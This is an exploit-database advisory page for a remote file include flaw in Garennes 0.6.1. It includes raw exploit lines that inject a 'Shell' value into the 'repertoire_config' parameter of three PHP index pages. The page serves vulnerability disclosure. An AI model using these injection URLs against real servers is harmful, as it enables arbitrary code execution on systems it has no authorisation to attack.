header-logo
Suggest Exploit
vendor:
Garennes
by:
GolD_M
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Garennes
Affected Version From: 2000.6.1
Affected Version To: 2000.6.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Garennes 0.6.1 <= Remote File Include Vulnerabilities

The Garennes version 0.6.1 is vulnerable to Remote File Include. This vulnerability allows an attacker to include remote files by exploiting the 'repertoire_config' parameter in various PHP files. The attacker can specify a malicious file as the value of the 'repertoire_config' parameter, leading to arbitrary code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Garennes or apply appropriate security measures such as input validation and sanitization.
Source

Exploit-DB raw data:

# Garennes 0.6.1 <= Remote File Include Vulnerablites
# D.Script: https://adullact.net/frs/download.php/672/garennes-easyphp-0.6.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/cpe/index.php?repertoire_config=Shell
# Exploit:[Path]/direction/index.php?repertoire_config=Shell
# Exploit:[Path]/professeurs/index.php?repertoire_config=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

# milw0rm.com [2007-04-13]

Navigation

Suggest Exploit

Services By CQR